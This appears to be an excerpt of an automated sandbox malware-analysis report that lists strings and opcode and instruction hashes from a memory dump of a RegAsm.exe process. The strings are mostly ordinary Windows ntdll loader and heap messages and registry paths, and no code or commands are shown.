                                • API ID:
                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                • API String ID: 0-336120773
                                • Opcode ID: 5d3750f5bb2680a6bb3be5be7d50a1434b9d29c1695e76673563ee3934130d70
                                • Instruction ID: 4c5f2dd5e37bc7ef907b253f86a10a3b4fe2c632e8aa65ad8c7ed28412671e0f
                                • Opcode Fuzzy Hash: 5d3750f5bb2680a6bb3be5be7d50a1434b9d29c1695e76673563ee3934130d70
                                • Instruction Fuzzy Hash: C6312431210110EFE710DB98C885F6673E9EF49768F190555F64ACB290D7B2ED40EF65
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 0-1391187441
                                • Opcode ID: b344a470973597330000bc36730fc69f78d22e0171aa1ec85a0eb2597cd1e9cf
                                • Instruction ID: f05e8ddda6f8e414b7b7b8582b73cde26825087b865e96aac89097aa6e69b2f6
                                • Opcode Fuzzy Hash: b344a470973597330000bc36730fc69f78d22e0171aa1ec85a0eb2597cd1e9cf
                                • Instruction Fuzzy Hash: 4331D236640104EFDB11DB49CC8AFAAB7F9EF46738F244161E915A7290D770ED81DE60
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $ $0
                                • API String ID: 0-3352262554
                                • Opcode ID: 049f9f171786891d3811901578370587602038664f06e78f1e77ccd1bfa6748d
                                • Instruction ID: f34b8d18091d9d10db03cde192c4b5b96f9a7d1a6cf9ea8ce0a88716eda68dd2
                                • Opcode Fuzzy Hash: 049f9f171786891d3811901578370587602038664f06e78f1e77ccd1bfa6748d
                                • Instruction Fuzzy Hash: 603212B16083819FD320CF69C494BABBBE5BBC8308F24492EF59987350D775E949CB52
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: 11679a2caaacc023ec04b16b21fd50e2aacec9bbe7fa969fa4bb1bed8bca9e81
                                • Instruction ID: d4d393f026b1a004a3ed384e03672fbc54e526a58bd484a40eb3d175f5d5c01e
                                • Opcode Fuzzy Hash: 11679a2caaacc023ec04b16b21fd50e2aacec9bbe7fa969fa4bb1bed8bca9e81
                                • Instruction Fuzzy Hash: 2AF1CE31A00605DFDB26DF69C884B6AB7F6FF84308F1485A8E4069B381D774EA81CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                • API String ID: 0-1145731471
                                • Opcode ID: 2ea1a3b64297080b1d74bb2de0106938e56858e2ec43fceb1e6cf91cf0acd034
                                • Instruction ID: f0d4f6d6e3332cf7b8775d7dc95993bd86a28f5936f18152c7148df27eb04275
                                • Opcode Fuzzy Hash: 2ea1a3b64297080b1d74bb2de0106938e56858e2ec43fceb1e6cf91cf0acd034
                                • Instruction Fuzzy Hash: 5CB1CF31A047948FCB25DF59C980BADB7B6AF84B0CF14856AE851EB380DB34ED44CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                • Opcode ID: 0dbc87ad47ab4a824ac7244e1be3369469ce52aa4cdc8b490f3bcab9b210819e
                                • Instruction ID: 49cbc51209bac6e6ed317de5e51aba0bac0b70fbd3b4fc1fa5494e896a034180
                                • Opcode Fuzzy Hash: 0dbc87ad47ab4a824ac7244e1be3369469ce52aa4cdc8b490f3bcab9b210819e
                                • Instruction Fuzzy Hash: 35B1D571644382AFD311DF54C8A4F67B7E8FB84718F00496AFA4197280D774ED45CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: FilterFullPath$UseFilter$\??\
                                • API String ID: 0-2779062949
                                • Opcode ID: 7b5164c570c557910839ccccdce4d6744836be3eab349b889d75c4b44bb6672b
                                • Instruction ID: 048629df4d3b5d0f4ad29c60e6c18f620f0bee5107448718d522003d248b96a9
                                • Opcode Fuzzy Hash: 7b5164c570c557910839ccccdce4d6744836be3eab349b889d75c4b44bb6672b
                                • Instruction Fuzzy Hash: B9A1677190162A9BDB219B64CC88BEAB7B9EF88704F1001EAE90DA7250D7359FC5CF54
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                • Opcode ID: 43f12a65bb9ec04296492c346a04ef14cb97b346f6e5f565b691c2b4b1ec2864
                                • Instruction ID: 7b8504ce208905d261c3e17395af6b19df60e9e9a91dc89e18da734d7f6a4b28
                                • Opcode Fuzzy Hash: 43f12a65bb9ec04296492c346a04ef14cb97b346f6e5f565b691c2b4b1ec2864
                                • Instruction Fuzzy Hash: 1981BE71608381AFD712DB15C984FAAB7E9EF84754F0409ADFD80AB390D775E904CBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: %$&$@
                                • API String ID: 0-1537733988
                                • Opcode ID: 1f95d3867e2206b0d20f7210ec1f6360e3741511e956c31dde61294db1eb0397
                                • Instruction ID: 4a40d084bfdb776a9b49f1e1f90d2d18466a5cb11f485e4919f864a5ef439009
                                • Opcode Fuzzy Hash: 1f95d3867e2206b0d20f7210ec1f6360e3741511e956c31dde61294db1eb0397
                                • Instruction Fuzzy Hash: 5E71CE70608711DFCB14DF24C984A2BBBE6BFC8718F10895DE89A47291C730DA85CF9A
                                Strings
                                • GlobalizationUserSettings, xrefs: 02CFB834
                                • TargetNtPath, xrefs: 02CFB82F
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02CFB82A
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                • Opcode ID: a2398ec2d9cb80396568a146336eceb97ed5df1e42016c965e3ec54bb91e5698
                                • Instruction ID: a0cbe3dc23a30617541cb0fba3a2b80ef280f7c9e2ec4e5703e592b5c41df837
                                • Opcode Fuzzy Hash: a2398ec2d9cb80396568a146336eceb97ed5df1e42016c965e3ec54bb91e5698
                                • Instruction Fuzzy Hash: 05617272D41629ABDBA1DF54DC88BD9B7B9AF08758F0101E5EA08A7250CB74DF84CF90
                                Strings
                                • HEAP: , xrefs: 02C7E6B3
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02C7E6C6
                                • HEAP[%wZ]: , xrefs: 02C7E6A6
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                • Opcode ID: 85115b9551ba7548d738ffdecb4367058e7aedeced31807a277dfb6382dd1545
                                • Instruction ID: 021a0b23135067d600f0f8b9ccab7765895ce5979440a2b3f84a216cba87bb4f
                                • Opcode Fuzzy Hash: 85115b9551ba7548d738ffdecb4367058e7aedeced31807a277dfb6382dd1545
                                • Instruction Fuzzy Hash: 7E512A31600784EFE712DB68C845F66BBF9FF46704F1440A4E541CB692D374EA41EB50
                                Strings
                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02C91B39
                                • minkernel\ntdll\ldrtls.c, xrefs: 02C91B4A
                                • LdrpAllocateTls, xrefs: 02C91B40
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-4274184382
                                • Opcode ID: ce0f50cfcf4dbf1d98fa9e7eaea929b35125512d442159c6e6fa3104ac81ff87
                                • Instruction ID: 87419cda58b651b1b5da9c945fe8a6cb6c2f6128ad165118084d0591fa0b9ed1
                                • Opcode Fuzzy Hash: ce0f50cfcf4dbf1d98fa9e7eaea929b35125512d442159c6e6fa3104ac81ff87
                                • Instruction Fuzzy Hash: AE41AA75E40605AFDB15CFA8C885BAEBBF6FF88344F084519E809A7300DBB4A940DF90
                                Strings
                                • PreferredUILanguages, xrefs: 02CDC212
                                • @, xrefs: 02CDC1F1
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02CDC1C5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                • API String ID: 0-2968386058
                                • Opcode ID: b6fd47dda967ea052a8cf8ac4f6593d4dc6e0291b0c953a8cf912c5bbc51062f
                                • Instruction ID: 83d1c57b819a7c8643b5828b0f4c720c9ec281752066b0d160989f73fa4acced
                                • Opcode Fuzzy Hash: b6fd47dda967ea052a8cf8ac4f6593d4dc6e0291b0c953a8cf912c5bbc51062f
                                • Instruction Fuzzy Hash: DF416D72E0020AEBDB11DAD4C885FEEB7BAAB54B04F14416BEA05B7280D7749B44DB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                • API String ID: 0-1373925480
                                • Opcode ID: dc68d0d3835831f8e6084ebe725abb89a1ebba919468bcae7104343b538721f6
                                • Instruction ID: 0ddda238c12b43a7b813614d4efe908fb023e6ca87a34347f80fe20712aa18f3
                                • Opcode Fuzzy Hash: dc68d0d3835831f8e6084ebe725abb89a1ebba919468bcae7104343b538721f6
                                • Instruction Fuzzy Hash: CC412131D086988BEB3ADB95C860BEDB7B9EF85344F1404A9D801FB382D7348A01DB51
                                Strings
                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02CA4888
                                • minkernel\ntdll\ldrredirect.c, xrefs: 02CA4899
                                • LdrpCheckRedirection, xrefs: 02CA488F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-3154609507
                                • Opcode ID: 2bca4cdce1f496bf6019e6d384a40d2287046d214983238d536bc5bf7cc76137
                                • Instruction ID: 603bae0e703f7b36c56420b2191fe486a187e65cca9b9a6972079d807e01cad4
                                • Opcode Fuzzy Hash: 2bca4cdce1f496bf6019e6d384a40d2287046d214983238d536bc5bf7cc76137
                                • Instruction Fuzzy Hash: 7F41D432A003D29FCB39CE59E860A26B7E5EF89B58F050569EC45D7311D7B0DD01CB91
                                Strings
                                • RtlCreateActivationContext, xrefs: 02C929F9
                                • SXS: %s() passed the empty activation context data, xrefs: 02C929FE
                                • Actx , xrefs: 02C533AC
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                • Opcode ID: 804bd7e916cac6a8bf3f739b55d0a06f4ef16f2b801ec66c20452665429e26fe
                                • Instruction ID: 61e931bb315dc1bad5830a2883303247b6901da96c32e0f039de5c3676c29754
                                • Opcode Fuzzy Hash: 804bd7e916cac6a8bf3f739b55d0a06f4ef16f2b801ec66c20452665429e26fe
                                • Instruction Fuzzy Hash: 09314433640395AFEF26DF58C884B967BA5EB84764F0584A9ED05DF281CB30ED81CB90
                                Strings
                                • minkernel\ntdll\ldrtls.c, xrefs: 02C91A51
                                • DLL "%wZ" has TLS information at %p, xrefs: 02C91A40
                                • LdrpInitializeTls, xrefs: 02C91A47
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-931879808
                                • Opcode ID: f6bd498871645f4116e7b9124088058c011c43b1b043c50d107412bf3c68e558
                                • Instruction ID: 06677229619139632864e99c741768486e6ebf953e25806cdae24f9e62758be3
                                • Opcode Fuzzy Hash: f6bd498871645f4116e7b9124088058c011c43b1b043c50d107412bf3c68e558
                                • Instruction Fuzzy Hash: D3314B31A40210FBEB108F49D889F6A73E9EB80744F480469E90967680DBF4EE81C754
                                Strings
                                • BuildLabEx, xrefs: 02C6130F
                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02C6127B
                                • @, xrefs: 02C612A5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-3051831665
                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction ID: d108a9ac3b05e090add84b71e0d046b7c031ad22fa783c46a0e5588d715c0e28
                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                • Instruction Fuzzy Hash: 1431CF72900519AFCF11AFA6CC88EEEBBBEEF84754F044025E909A7260D770DA45DB90
                                Strings
                                • Process initialization failed with status 0x%08lx, xrefs: 02CA20F3
                                • minkernel\ntdll\ldrinit.c, xrefs: 02CA2104
                                • LdrpInitializationFailure, xrefs: 02CA20FA
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2986994758
                                • Opcode ID: 24b7a1c2d3c0fbe4a7819718f89e4d8bbf136a2d05f181ba6d39c548fca49d92
                                • Instruction ID: 51c11797104bc67c0234c8a89096019e06f04a8c2645672f0ad8272ba6ce3aa8
                                • Opcode Fuzzy Hash: 24b7a1c2d3c0fbe4a7819718f89e4d8bbf136a2d05f181ba6d39c548fca49d92
                                • Instruction Fuzzy Hash: 27F02831A802197BE724D64CDC96F95376DEB81B4CF400069FF00776C0D6B0AE00CA42
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: #%u
                                • API String ID: 48624451-232158463
                                • Opcode ID: 8ae4ab3770ac75b8650959c5bc1b066906c42edc1fb6bdecab3cbc1e4eefa2ec
                                • Instruction ID: 0e8ffde1cc06330ce520e92cff95f413a0300626baa664b5f00ccd203624762d
                                • Opcode Fuzzy Hash: 8ae4ab3770ac75b8650959c5bc1b066906c42edc1fb6bdecab3cbc1e4eefa2ec
                                • Instruction Fuzzy Hash: EA716C72A0014A9FDB15DFA8C995BAEB7F9FF48348F144465E901E7251EB34EE01CBA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                • Opcode ID: bc2e8e086fc7a6503b90672b8a13e9c1645a97e76924dd62622e448b96c600eb
                                • Instruction ID: 28fa006c33b9a6a4243f5d37d6274781e38d0f7ae4ca2dc68727bca82b854b03
                                • Opcode Fuzzy Hash: bc2e8e086fc7a6503b90672b8a13e9c1645a97e76924dd62622e448b96c600eb
                                • Instruction Fuzzy Hash: 28328B705083518BC7259F19C484B7EB7F5EFC9788F94892EF9859B290E734DA80CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: `$`
                                • API String ID: 0-197956300
                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction ID: 68e1dd49f29d6da32c3b6dc7fcc866810178477e9183f345ac7fce91efef035a
                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                • Instruction Fuzzy Hash: A8C1D0722043419FDB24CF29C845B6BBBE6AFC4318F184A2DF996CA290D774D645CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: Legacy$UEFI
                                • API String ID: 2994545307-634100481
                                • Opcode ID: 8af9bd006e0dc3e2e83ceaa1d1805a751d5761c60f1c7601ebbe5205c131ca92
                                • Instruction ID: 1d2dccb0460ada2f4bc3d0c542fa8ec12ef13770a7159da3e4f1403751e4ce98
                                • Opcode Fuzzy Hash: 8af9bd006e0dc3e2e83ceaa1d1805a751d5761c60f1c7601ebbe5205c131ca92
                                • Instruction Fuzzy Hash: FB616E71E006189FDF24DFA9C888BAEBBB5FF58704F14406EE649EB291D731A940CB54
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$$
                                • API String ID: 0-233714265
                                • Opcode ID: 9b14e938329dca3168c0bd4871962d0fe354fcc3ba5f2255b82cccb63228dbdc
                                • Instruction ID: 77319d83ab9f758bc1ebb023151f7950202e44100271e6a20864e1460fd17a90
                                • Opcode Fuzzy Hash: 9b14e938329dca3168c0bd4871962d0fe354fcc3ba5f2255b82cccb63228dbdc
                                • Instruction Fuzzy Hash: 7361CD71E00789DBDB26DFA4D580BADB7B2BF84308F144C2DD506ABB40CB74AA45DB91
                                Strings
                                • kLsE, xrefs: 02C20540
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02C2063D
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 0-2547482624
                                • Opcode ID: b56d828422acd667fe4acea55faeb0584bc05900217d071dbf45f2bc14f0d0a2
                                • Instruction ID: 203d6305417aa14da6088ef827b6fcf747728cab3a5cf6fc6b0024e32d799670
                                • Opcode Fuzzy Hash: b56d828422acd667fe4acea55faeb0584bc05900217d071dbf45f2bc14f0d0a2
                                • Instruction Fuzzy Hash: 6951BD715147629FC724DF68C5447A7B7E8AFD4704F00483EE99A87240EB70D649CF96
                                Strings
                                • RtlpResUltimateFallbackInfo Enter, xrefs: 02C2A2FB
                                • RtlpResUltimateFallbackInfo Exit, xrefs: 02C2A309
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                • API String ID: 0-2876891731
                                • Opcode ID: 9c3a8dec4ccd4350bca0902967a0963294255ecc3bec3d81a96e1103d2c4fc10
                                • Instruction ID: f14e76235dede15fa0f1f6e1f79fe510c507aed6be10d09ea2f87dea8e364472
                                • Opcode Fuzzy Hash: 9c3a8dec4ccd4350bca0902967a0963294255ecc3bec3d81a96e1103d2c4fc10
                                • Instruction Fuzzy Hash: A041D131A016A9DBCB21DF69C944B6E77F4FF84718F1480A9EC05DB251EB35DA04CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                • Opcode ID: 8c1b97ced234a2e77810cb84f68bb6d9cada8d86fd20f5fe9a38c3616c0fe2f1
                                • Instruction ID: 2de3d53108092e3939fec8131fc7b4ce054573e34b4bdadb800f7f8025f9de69
                                • Opcode Fuzzy Hash: 8c1b97ced234a2e77810cb84f68bb6d9cada8d86fd20f5fe9a38c3616c0fe2f1
                                • Instruction Fuzzy Hash: 4F31B272508794AFC311DF29C484A6BBBE8EBC4794F40096EF99983210DB30DD46DB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: MUI
                                • API String ID: 0-1339004836
                                • Opcode ID: 5c6b2aaefeab34f8e2157b83f0bf24ce5b58effd9a698ea8dc340fbf44bcc2b1
                                • Instruction ID: b293d80166324d8c7de02d5a6ed8d3f06c6f292e8b504ce1222b5c7b4b1e941a
                                • Opcode Fuzzy Hash: 5c6b2aaefeab34f8e2157b83f0bf24ce5b58effd9a698ea8dc340fbf44bcc2b1
                                • Instruction Fuzzy Hash: 3A824D75E002688FDB24CFA9C9847ADB7B5FF88314F15816AD85AAB350DB309E49CF50
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de4db7f84abd30356b5d4294f516cc213b51c7742a54d4200bf6962308613f4b
                                • Instruction ID: 3c45d48e95f88030450184b355f59867ff514cfe38eda5aaec2100354934ceab
                                • Opcode Fuzzy Hash: de4db7f84abd30356b5d4294f516cc213b51c7742a54d4200bf6962308613f4b
                                • Instruction Fuzzy Hash: 82A15C71A08341DFC721DF29D480A2AFBE6BF88704F15496DE58997350EB70EA49CF92
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6d4110f7dedf7993266c7c1c7da26763ddfb54d1aee707297dce719eb9353adf
                                • Instruction ID: 3688cc1bdfdf7a9b335aa5a0fd9dbdfbceb968a696db12f5cb0a7147817f5b26
                                • Opcode Fuzzy Hash: 6d4110f7dedf7993266c7c1c7da26763ddfb54d1aee707297dce719eb9353adf
                                • Instruction Fuzzy Hash: 56416D74D01298EFDB24CFA9D480AAEBBF9FB49304F10456EE859A7711CB309941CF64
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalTags
                                • API String ID: 0-1106856819
                                • Opcode ID: 815fad0952397786f215c22e1808ddfc2c884635cf7ab204a0a4367ebcd5050d
                                • Instruction ID: 485f633cc4c439ca3f0915fe2dcaa75a792f1d7c0e3a1b96c4017c7a6a025591
                                • Opcode Fuzzy Hash: 815fad0952397786f215c22e1808ddfc2c884635cf7ab204a0a4367ebcd5050d
                                • Instruction Fuzzy Hash: 3D717075E0021ADFDF28CF99D594AADB7B6BF88744F24812EE805A7380DB319941CF54
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction ID: c0d3987277af4aa05aca92af0c78a4f5c96d936e5562c3b7d3a3a06f7ed863bb
                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction Fuzzy Hash: FC619F71D00269AFDF21DFA5C844BEEBBB5FF80718F284169E810B7250DB749A05DB61
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
